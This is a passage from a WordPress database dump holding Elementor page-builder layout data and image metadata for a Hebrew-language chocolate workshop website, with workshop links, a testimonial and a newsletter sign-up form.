\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"88ba40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3f463b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: left;\\\">\\u05e9\\u05de\\u05d5\\u05dc: <span style=\\\"color: #ff9900;\\\"><a style=\\\"color: #ff9900;\\\" href=\\\"https:\\/\\/www.shmul.co.il\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u05e7\\u05d9\\u05d3\\u05d5\\u05dd \\u05d0\\u05ea\\u05e8\\u05d9\\u05dd \\u05d0\\u05d5\\u05e8\\u05d2\\u05e0\\u05d9<\\/a><\\/span><\\/p>\",\"text_color\":\"#fcfcfc\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(929,189,'_elementor_version','0.4'),(931,190,'_wp_attached_file','2018/06/logo1.png'),(932,190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:198;s:6:\"height\";i:171;s:4:\"file\";s:17:\"2018/06/logo1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:17:\"logo1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(933,191,'_wp_attached_file','2018/06/cropped-logo1.png'),(934,191,'_wp_attachment_context','custom-logo'),(935,191,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:25:\"2018/06/cropped-logo1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"cropped-logo1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:25:\"cropped-logo1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(938,193,'_wp_page_template','elementor_canvas'),(939,193,'_elementor_edit_mode','builder'),(940,193,'_elementor_template_type','post'),(941,193,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"